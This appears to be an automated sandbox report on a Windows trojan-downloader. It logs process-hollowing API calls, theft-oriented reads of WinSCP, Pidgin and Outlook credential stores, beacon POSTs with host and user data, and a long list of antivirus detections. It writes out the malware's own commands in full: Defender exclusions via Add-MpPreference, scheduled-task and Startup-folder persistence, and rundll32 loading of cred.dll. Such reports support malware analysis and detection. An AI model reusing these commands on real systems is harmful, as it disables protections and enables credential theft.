registry HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Sessions
file C:\Users\test22\AppData\Roaming\.purple\accounts.xml
Time & API Arguments Status Return Repeated

WriteProcessMemory

 buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $iÒ-z¼D-z¼D-z¼Dv¿E'z¼Dv¹E²z¼Dv¸E?z¼Dø¸E?z¼Dø¿E?z¼Dø¹Ez¼Dv½E&z¼D-z½D¤z¼D¶µE,z¼D¶CD,z¼D¶¾E,z¼DRich-z¼DPELÁ<”`à P¸+õ`@p@¨Ôx@ÀPPPÇpÀÇ@`ø.textNP `.rdata €`‚T@@.dataEðÖ@À.rsrcÀ@ê@@.relocPPî@B
base_address: 0x00400000
process_identifier: 3028
process_handle: 0x00000428
1 1 0

WriteProcessMemory

 buffer: €0€ HX@häh4VS_VERSION_INFO½ïþ?ÈStringFileInfo¤040904b1, CommentsSTWE LXVK(CompanyNameZwV8FileDescriptionIAh UXt0FileVersion2.4.3.7: InternalNameAEUM Sty.exez+LegalCopyrightCopyright 2020 © LMF. All rights reserved.2LegalTrademarksEKeHB OriginalFilenameAEUM Sty.exe2 ProductNameAEUM Sty4ProductVersion3.6.5.58Assembly Version3.6.5.5DVarFileInfo$Translation PADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDING
base_address: 0x00434000
process_identifier: 3028
process_handle: 0x00000428
1 1 0

WriteProcessMemory

 buffer: @
base_address: 0xfffde008
process_identifier: 3028
process_handle: 0x00000428
1 1 0

WriteProcessMemory

 buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $iÒ-z¼D-z¼D-z¼Dv¿E'z¼Dv¹E²z¼Dv¸E?z¼Dø¸E?z¼Dø¿E?z¼Dø¹Ez¼Dv½E&z¼D-z½D¤z¼D¶µE,z¼D¶CD,z¼D¶¾E,z¼DRich-z¼DPELÁ<”`à P¸+õ`@p@¨Ôx@ÀPPPÇpÀÇ@`ø.textNP `.rdata €`‚T@@.dataEðÖ@À.rsrcÀ@ê@@.relocPPî@B
base_address: 0x00400000
process_identifier: 2540
process_handle: 0x00000414
1 1 0

WriteProcessMemory

 buffer: €0€ HX@häh4VS_VERSION_INFO½ïþ?ÈStringFileInfo¤040904b1, CommentsSTWE LXVK(CompanyNameZwV8FileDescriptionIAh UXt0FileVersion2.4.3.7: InternalNameAEUM Sty.exez+LegalCopyrightCopyright 2020 © LMF. All rights reserved.2LegalTrademarksEKeHB OriginalFilenameAEUM Sty.exe2 ProductNameAEUM Sty4ProductVersion3.6.5.58Assembly Version3.6.5.5DVarFileInfo$Translation PADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDING
base_address: 0x00434000
process_identifier: 2540
process_handle: 0x00000414
1 1 0

WriteProcessMemory

 buffer: @
base_address: 0xfffde008
process_identifier: 2540
process_handle: 0x00000414
1 1 0
Time & API Arguments Status Return Repeated

WriteProcessMemory

 buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $iÒ-z¼D-z¼D-z¼Dv¿E'z¼Dv¹E²z¼Dv¸E?z¼Dø¸E?z¼Dø¿E?z¼Dø¹Ez¼Dv½E&z¼D-z½D¤z¼D¶µE,z¼D¶CD,z¼D¶¾E,z¼DRich-z¼DPELÁ<”`à P¸+õ`@p@¨Ôx@ÀPPPÇpÀÇ@`ø.textNP `.rdata €`‚T@@.dataEðÖ@À.rsrcÀ@ê@@.relocPPî@B
base_address: 0x00400000
process_identifier: 3028
process_handle: 0x00000428
1 1 0

WriteProcessMemory

 buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $iÒ-z¼D-z¼D-z¼Dv¿E'z¼Dv¹E²z¼Dv¸E?z¼Dø¸E?z¼Dø¿E?z¼Dø¹Ez¼Dv½E&z¼D-z½D¤z¼D¶µE,z¼D¶CD,z¼D¶¾E,z¼DRich-z¼DPELÁ<”`à P¸+õ`@p@¨Ôx@ÀPPPÇpÀÇ@`ø.textNP `.rdata €`‚T@@.dataEðÖ@À.rsrcÀ@ê@@.relocPPî@B
base_address: 0x00400000
process_identifier: 2540
process_handle: 0x00000414
1 1 0
registry HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
Process injection Process 2648 called NtSetContextThread to modify thread in remote process 3028
Process injection Process 1568 called NtSetContextThread to modify thread in remote process 2540
Time & API Arguments Status Return Repeated

NtSetContextThread

 registers.eip: 0
registers.esp: 0
registers.edi: 0
registers.eax: 4257067
registers.ebp: 0
registers.edx: 0
registers.ebx: -139264
registers.esi: 0
registers.ecx: 0
thread_handle: 0x00000424
process_identifier: 3028
1 0 0

NtSetContextThread

 registers.eip: 0
registers.esp: 0
registers.edi: 0
registers.eax: 4257067
registers.ebp: 0
registers.edx: 0
registers.ebx: -139264
registers.esi: 0
registers.ecx: 0
thread_handle: 0x00000410
process_identifier: 2540
1 0 0
cmd "c:\windows\system32\schtasks.exe" /create /sc minute /mo 1 /tn blfte.exe /tr "c:\users\test22\appdata\local\temp\9be4a78dfb\blfte.exe" /f"c:\windows\system32\rundll32.exe" c:\programdata\1428cad52d922f\cred.dll, main"c:\windows\system32\windowspowershell\v1.0\powershell.exe" add-mppreference -exclusionpath "c:\users\test22\appdata\local\temp\ao.exe" -forcetimeout 1rundll32.exe c:\programdata\1428cad52d922f\cred.dll, main"c:\users\test22\appdata\local\temp\6124f2a7-8a2c-4783-89ce-0314c0f4a84f\advancedrun.exe" /exefilename "c:\users\test22\appdata\local\temp\6124f2a7-8a2c-4783-89ce-0314c0f4a84f\test.bat" /windowstate ""0"" /priorityclass ""32"" /commandline "" /startdirectory "" /runas 8 /runpowershell add-mppreference -exclusionpath "c:\users\test22\appdata\local\temp\9be4a78dfb\blfte.exe" -forcerundll32.exe c:\programdata\1428cad52d922f\scr.dll, main"c:\users\test22\appdata\local\temp\a2ad8163-11d5-4f89-89e5-fc093bda31ef\advancedrun.exe" /exefilename "c:\users\test22\appdata\local\temp\a2ad8163-11d5-4f89-89e5-fc093bda31ef\test.bat" /windowstate ""0"" /priorityclass ""32"" /commandline "" /startdirectory "" /runas 8 /runc:\users\test22\appdata\local\temp\ao.exe"c:\windows\system32\rundll32.exe" c:\programdata\1428cad52d922f\scr.dll, mainc:\users\test22\appdata\local\temp\9be4a78dfb\blfte.exereg add "hkcu\software\microsoft\windows\currentversion\explorer\user shell folders" /f /v startup /t reg_sz /d c:\users\test22\appdata\local\temp\9be4a78dfb\c:\users\test22\appdata\local\temp\a2ad8163-11d5-4f89-89e5-fc093bda31ef\advancedrun.exe /exefilename "c:\users\test22\appdata\local\temp\a2ad8163-11d5-4f89-89e5-fc093bda31ef\test.bat" /windowstate ""0"" /priorityclass ""32"" /commandline "" /startdirectory "" /runas 8 /run"c:\windows\system32\windowspowershell\v1.0\powershell.exe" add-mppreference -exclusionpath "c:\users\test22\appdata\local\temp\9be4a78dfb\blfte.exe" -force"c:\windows\system32\cmd.exe" /c reg add "hkcu\software\microsoft\windows\currentversion\explorer\user shell folders" /f /v startup /t reg_sz /d c:\users\test22\appdata\local\temp\9be4a78dfb\"c:\users\test22\appdata\local\temp\9be4a78dfb\blfte.exe" powershell add-mppreference -exclusionpath "c:\users\test22\appdata\local\temp\ao.exe" -forcecmd.exe /c timeout 1"c:\windows\system32\cmd.exe" /c timeout 1c:\users\test22\appdata\local\temp\6124f2a7-8a2c-4783-89ce-0314c0f4a84f\advancedrun.exe /exefilename "c:\users\test22\appdata\local\temp\6124f2a7-8a2c-4783-89ce-0314c0f4a84f\test.bat" /windowstate ""0"" /priorityclass ""32"" /commandline "" /startdirectory "" /runas 8 /runschtasks /create /sc minute /mo 1 /tn blfte.exe /tr "c:\users\test22\appdata\local\temp\9be4a78dfb\blfte.exe" /fcmd /c reg add "hkcu\software\microsoft\windows\currentversion\explorer\user shell folders" /f /v startup /t reg_sz /d c:\users\test22\appdata\local\temp\9be4a78dfb\
Time & API Arguments Status Return Repeated

HttpSendRequestA

 headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc0010
post_data: id=152138328664&vs=2.20&sd=ab27f8&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0
1 1 0

HttpSendRequestA

 headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc0010
post_data: id=152138328664&vs=2.20&sd=ab27f8&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0
1 1 0

HttpSendRequestA

 headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc0010
post_data: id=152138328664&vs=2.20&sd=ab27f8&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0
1 1 0

HttpSendRequestA

 headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc0010
post_data: id=152138328664&vs=2.20&sd=ab27f8&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0
1 1 0

HttpSendRequestA

 headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc0010
post_data: id=152138328664&vs=2.20&sd=ab27f8&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0
1 1 0

HttpSendRequestA

 headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc0010
post_data: id=152138328664&vs=2.20&sd=ab27f8&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0
1 1 0

HttpSendRequestA

 headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc0010
post_data: id=152138328664&vs=2.20&sd=ab27f8&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0
1 1 0

HttpSendRequestA

 headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc0010
post_data: id=152138328664&vs=2.20&sd=ab27f8&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0
1 1 0

HttpSendRequestA

 headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc0010
post_data: id=152138328664&vs=2.20&sd=ab27f8&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0
1 1 0

HttpSendRequestA

 headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc0010
post_data: id=152138328664&vs=2.20&sd=ab27f8&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0
1 1 0

HttpSendRequestA

 headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc0010
post_data: id=152138328664&vs=2.20&sd=ab27f8&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0
1 1 0

HttpSendRequestA

 headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc0010
post_data: id=152138328664&vs=2.20&sd=ab27f8&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0
1 1 0

HttpSendRequestA

 headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc0010
post_data: id=152138328664&vs=2.20&sd=ab27f8&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0
1 1 0

HttpSendRequestA

 headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc0010
post_data: id=152138328664&vs=2.20&sd=ab27f8&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0
1 1 0

HttpSendRequestA

 headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc0010
post_data: id=152138328664&vs=2.20&sd=ab27f8&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0
1 1 0

HttpSendRequestA

 headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc0010
post_data: id=152138328664&vs=2.20&sd=ab27f8&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0
1 1 0

HttpSendRequestA

 headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=152138328664&vs=2.20&sd=ab27f8&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0
1 1 0

HttpSendRequestA

 headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=152138328664&vs=2.20&sd=ab27f8&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0
1 1 0

HttpSendRequestA

 headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=152138328664&vs=2.20&sd=ab27f8&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0
1 1 0

HttpSendRequestA

 headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=152138328664&vs=2.20&sd=ab27f8&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0
1 1 0

HttpSendRequestA

 headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=152138328664&vs=2.20&sd=ab27f8&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0
1 1 0

HttpSendRequestA

 headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=152138328664&vs=2.20&sd=ab27f8&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0
1 1 0

HttpSendRequestA

 headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=152138328664&vs=2.20&sd=ab27f8&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0
1 1 0

HttpSendRequestA

 headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=152138328664&vs=2.20&sd=ab27f8&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0
1 1 0

HttpSendRequestA

 headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=152138328664&vs=2.20&sd=ab27f8&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0
1 1 0

HttpSendRequestA

 headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=152138328664&vs=2.20&sd=ab27f8&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0
1 1 0

HttpSendRequestA

 headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=152138328664&vs=2.20&sd=ab27f8&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0
1 1 0

HttpSendRequestA

 headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=152138328664&vs=2.20&sd=ab27f8&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0
1 1 0

HttpSendRequestA

 headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=152138328664&vs=2.20&sd=ab27f8&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0
1 1 0

HttpSendRequestA

 headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=152138328664&vs=2.20&sd=ab27f8&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0
1 1 0

HttpSendRequestA

 headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=152138328664&vs=2.20&sd=ab27f8&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0
1 1 0

HttpSendRequestA

 headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=152138328664&vs=2.20&sd=ab27f8&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0
1 1 0
Process injection Process 2648 resumed a thread in remote process 3028
Process injection Process 1568 resumed a thread in remote process 2540
Time & API Arguments Status Return Repeated

NtResumeThread

 thread_handle: 0x00000424
suspend_count: 1
process_identifier: 3028
1 0 0

NtResumeThread

 thread_handle: 0x00000410
suspend_count: 1
process_identifier: 2540
1 0 0
registry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Spynet
file C:\Windows\System32\ie4uinit.exe
file C:\Program Files\Windows Sidebar\sidebar.exe
file C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file C:\Windows\System32\xpsrchvw.exe
file C:\Windows\System32\displayswitch.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file C:\Windows\System32\mblctr.exe
file C:\Windows\System32\mstsc.exe
file C:\Windows\System32\SnippingTool.exe
file C:\Windows\System32\SoundRecorder.exe
file C:\Windows\System32\dfrgui.exe
file C:\Windows\System32\msinfo32.exe
file C:\Windows\System32\rstrui.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file C:\Program Files\Windows Journal\Journal.exe
file C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
file C:\Windows\System32\MdSched.exe
file C:\Windows\System32\msconfig.exe
file C:\Windows\System32\recdisc.exe
file C:\Windows\System32\msra.exe
description attempts to modify windows defender policies registry HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable
description attempts to modify windows defender policies registry HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring
description attempts to modify windows defender policies registry HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware
description attempts to modify windows defender policies registry HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection
Time & API Arguments Status Return Repeated

NtResumeThread

 thread_handle: 0x000000e0
suspend_count: 1
process_identifier: 2648
1 0 0

NtResumeThread

 thread_handle: 0x00000154
suspend_count: 1
process_identifier: 2648
1 0 0

NtResumeThread

 thread_handle: 0x00000194
suspend_count: 1
process_identifier: 2648
1 0 0

NtResumeThread

 thread_handle: 0x0000020c
suspend_count: 1
process_identifier: 2648
1 0 0

NtGetContextThread

 thread_handle: 0x000000e8
1 0 0

NtGetContextThread

 thread_handle: 0x000000e8
1 0 0

NtResumeThread

 thread_handle: 0x000000e8
suspend_count: 1
process_identifier: 2648
1 0 0

NtGetContextThread

 thread_handle: 0x000000e8
1 0 0

NtGetContextThread

 thread_handle: 0x000000e8
1 0 0

NtResumeThread

 thread_handle: 0x000000e8
suspend_count: 1
process_identifier: 2648
1 0 0

NtGetContextThread

 thread_handle: 0x000000e8
1 0 0

NtGetContextThread

 thread_handle: 0x000000e8
1 0 0

NtResumeThread

 thread_handle: 0x000000e8
suspend_count: 1
process_identifier: 2648
1 0 0

CreateProcessInternalW

 thread_identifier: 2264
thread_handle: 0x00000398
process_identifier: 2244
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Users\test22\AppData\Local\Temp\a2ad8163-11d5-4f89-89e5-fc093bda31ef\AdvancedRun.exe
track: 1
command_line: "C:\Users\test22\AppData\Local\Temp\a2ad8163-11d5-4f89-89e5-fc093bda31ef\AdvancedRun.exe" /EXEFilename "C:\Users\test22\AppData\Local\Temp\a2ad8163-11d5-4f89-89e5-fc093bda31ef\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
filepath_r: C:\Users\test22\AppData\Local\Temp\a2ad8163-11d5-4f89-89e5-fc093bda31ef\AdvancedRun.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x000003a0
1 1 0

CreateProcessInternalW

 thread_identifier: 1572
thread_handle: 0x000003f0
process_identifier: 2448
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
track: 1
command_line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Local\Temp\ao.exe" -Force
filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x00000408
1 1 0

CreateProcessInternalW

 thread_identifier: 2216
thread_handle: 0x000003e8
process_identifier: 2444
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Windows\System32\cmd.exe
track: 1
command_line: "C:\Windows\System32\cmd.exe" /c timeout 1
filepath_r: C:\Windows\System32\cmd.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x00000414
1 1 0

CreateProcessInternalW

 thread_identifier: 1452
thread_handle: 0x00000424
process_identifier: 3028
current_directory:
filepath: C:\Users\test22\AppData\Local\Temp\ao.exe
track: 1
command_line:
filepath_r: C:\Users\test22\AppData\Local\Temp\ao.exe
stack_pivoted: 0
creation_flags: 134217732 (CREATE_NO_WINDOW|CREATE_SUSPENDED)
inherit_handles: 0
process_handle: 0x00000428
1 1 0

NtGetContextThread

 thread_handle: 0x00000424
1 0 0

NtAllocateVirtualMemory

 process_identifier: 3028
region_size: 225280
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x00000428
1 0 0

WriteProcessMemory

 buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $iÒ-z¼D-z¼D-z¼Dv¿E'z¼Dv¹E²z¼Dv¸E?z¼Dø¸E?z¼Dø¿E?z¼Dø¹Ez¼Dv½E&z¼D-z½D¤z¼D¶µE,z¼D¶CD,z¼D¶¾E,z¼DRich-z¼DPELÁ<”`à P¸+õ`@p@¨Ôx@ÀPPPÇpÀÇ@`ø.textNP `.rdata €`‚T@@.dataEðÖ@À.rsrcÀ@ê@@.relocPPî@B
base_address: 0x00400000
process_identifier: 3028
process_handle: 0x00000428
1 1 0

WriteProcessMemory

 buffer:
base_address: 0x00401000
process_identifier: 3028
process_handle: 0x00000428
1 1 0

WriteProcessMemory

 buffer:
base_address: 0x00426000
process_identifier: 3028
process_handle: 0x00000428
1 1 0

WriteProcessMemory

 buffer:
base_address: 0x0042f000
process_identifier: 3028
process_handle: 0x00000428
1 1 0

WriteProcessMemory

 buffer: €0€ HX@häh4VS_VERSION_INFO½ïþ?ÈStringFileInfo¤040904b1, CommentsSTWE LXVK(CompanyNameZwV8FileDescriptionIAh UXt0FileVersion2.4.3.7: InternalNameAEUM Sty.exez+LegalCopyrightCopyright 2020 © LMF. All rights reserved.2LegalTrademarksEKeHB OriginalFilenameAEUM Sty.exe2 ProductNameAEUM Sty4ProductVersion3.6.5.58Assembly Version3.6.5.5DVarFileInfo$Translation PADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDING
base_address: 0x00434000
process_identifier: 3028
process_handle: 0x00000428
1 1 0

WriteProcessMemory

 buffer:
base_address: 0x00435000
process_identifier: 3028
process_handle: 0x00000428
1 1 0

WriteProcessMemory

 buffer: @
base_address: 0xfffde008
process_identifier: 3028
process_handle: 0x00000428
1 1 0

NtSetContextThread

 registers.eip: 0
registers.esp: 0
registers.edi: 0
registers.eax: 4257067
registers.ebp: 0
registers.edx: 0
registers.ebx: -139264
registers.esi: 0
registers.ecx: 0
thread_handle: 0x00000424
process_identifier: 3028
1 0 0

NtResumeThread

 thread_handle: 0x00000424
suspend_count: 1
process_identifier: 3028
1 0 0

NtResumeThread

 thread_handle: 0x00000298
suspend_count: 1
process_identifier: 2448
1 0 0

NtResumeThread

 thread_handle: 0x000002ec
suspend_count: 1
process_identifier: 2448
1 0 0

NtResumeThread

 thread_handle: 0x00000448
suspend_count: 1
process_identifier: 2448
1 0 0

NtResumeThread

 thread_handle: 0x000004a8
suspend_count: 1
process_identifier: 2448
1 0 0

CreateProcessInternalW

 thread_identifier: 2264
thread_handle: 0x00000084
process_identifier: 584
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Windows\System32\timeout.exe
track: 1
command_line: timeout 1
filepath_r: C:\Windows\system32\timeout.exe
stack_pivoted: 0
creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 1
process_handle: 0x00000088
1 1 0

NtResumeThread

 thread_handle: 0x000000ec
suspend_count: 1
process_identifier: 3028
1 0 0

CreateProcessInternalW

 thread_identifier: 808
thread_handle: 0x00000270
process_identifier: 1568
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Users\test22\AppData\Local\Temp\9be4a78dfb\blfte.exe
track: 1
command_line: "C:\Users\test22\AppData\Local\Temp\9be4a78dfb\blfte.exe"
filepath_r: C:\Users\test22\AppData\Local\Temp\9be4a78dfb\blfte.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x00000278
1 1 0

NtResumeThread

 thread_handle: 0x000000e0
suspend_count: 1
process_identifier: 1568
1 0 0

NtResumeThread

 thread_handle: 0x00000158
suspend_count: 1
process_identifier: 1568
1 0 0

NtResumeThread

 thread_handle: 0x0000019c
suspend_count: 1
process_identifier: 1568
1 0 0

NtResumeThread

 thread_handle: 0x0000020c
suspend_count: 1
process_identifier: 1568
1 0 0

NtGetContextThread

 thread_handle: 0x000000e8
1 0 0

NtGetContextThread

 thread_handle: 0x000000e8
1 0 0

NtResumeThread

 thread_handle: 0x000000e8
suspend_count: 1
process_identifier: 1568
1 0 0

NtGetContextThread

 thread_handle: 0x000000e8
1 0 0

NtGetContextThread

 thread_handle: 0x000000e8
1 0 0

NtResumeThread

 thread_handle: 0x000000e8
suspend_count: 1
process_identifier: 1568
1 0 0

NtGetContextThread

 thread_handle: 0x000000e8
1 0 0

NtGetContextThread

 thread_handle: 0x000000e8
1 0 0

NtResumeThread

 thread_handle: 0x000000e8
suspend_count: 1
process_identifier: 1568
1 0 0

NtGetContextThread

 thread_handle: 0x000000e8
1 0 0

NtGetContextThread

 thread_handle: 0x000000e8
1 0 0
Elastic malicious (high confidence)
Cynet Malicious (score: 100)
ALYac Trojan.GenericKD.36977766
Sangfor Trojan.Win32.Save.a
K7AntiVirus Trojan ( 004c77211 )
Alibaba TrojanDownloader:MSIL/Kryptik.91664c5d
K7GW Trojan ( 004c77211 )
Cybereason malicious.69416f
Cyren W32/MSIL_Kryptik.ECN.gen!Eldorado
Symantec Trojan Horse
ESET-NOD32 a variant of MSIL/Kryptik.CQR
APEX Malicious
Paloalto generic.ml
Kaspersky HEUR:Trojan-Downloader.MSIL.Deyma.gen
BitDefender Trojan.GenericKD.36977766
BitDefenderTheta Gen:NN.ZemsilF.34692.Np2@aSR7DRmi
MicroWorld-eScan Trojan.GenericKD.36977766
Avast Win32:MalwareX-gen [Trj]
Ad-Aware Trojan.GenericKD.36977766
Emsisoft Trojan.Crypt (A)
VIPRE Trojan.Win32.Generic!BT
TrendMicro TROJ_GEN.R023C0WET21
McAfee-GW-Edition Artemis!Trojan
FireEye Generic.mg.b1d319888860b7a6
Sophos Mal/Generic-S
Ikarus Trojan.MSIL.Crypt
Avira TR/Kryptik.dfdyr
Kingsoft Win32.Troj.Undef.(kcloud)
Gridinsoft Trojan.Win32.Kryptik.oa
Arcabit Trojan.Generic.D2343C66
AegisLab Trojan.MSIL.Deyma.a!c
ZoneAlarm HEUR:Trojan-Downloader.MSIL.Deyma.gen
GData Trojan.GenericKD.36977766
AhnLab-V3 Trojan/Win.Generic.C4498305
McAfee Artemis!B1D319888860
MAX malware (ai score=99)
Malwarebytes Trojan.MalPack.MSIL
TrendMicro-HouseCall TROJ_GEN.R023C0WET21
Rising Downloader.Deyma!8.1093B (CLOUD)
Yandex Trojan.Kryptik!7j+BP6dkVV4
SentinelOne Static AI - Malicious PE
Fortinet MSIL/Agent.AES!tr
AVG Win32:MalwareX-gen [Trj]
Panda Trj/CI.A
CrowdStrike win/malicious_confidence_90% (W)